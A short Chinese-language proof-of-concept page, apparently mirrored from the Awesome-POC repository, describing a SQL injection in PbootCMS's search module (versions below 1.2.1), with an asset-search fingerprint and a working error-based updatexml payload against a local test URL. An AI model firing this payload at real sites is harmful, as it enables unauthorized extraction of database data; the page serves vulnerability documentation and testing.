admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 03:17:19 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/CMS漏洞/PbootCMS search SQL注入漏洞.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

548 B
Raw Blame History

PbootCMS search SQL注入漏洞

漏洞描述

PbootCMS 搜索模块存在SQL注入漏洞。通过漏洞可获取数据库敏感信息

漏洞影响

PbootCMS < 1.2.1

网络测绘

app="PBOOTCMS"

漏洞复现

搜索框页面为

Payload为

/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123](http://127.0.0.1/PbootCMS/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123)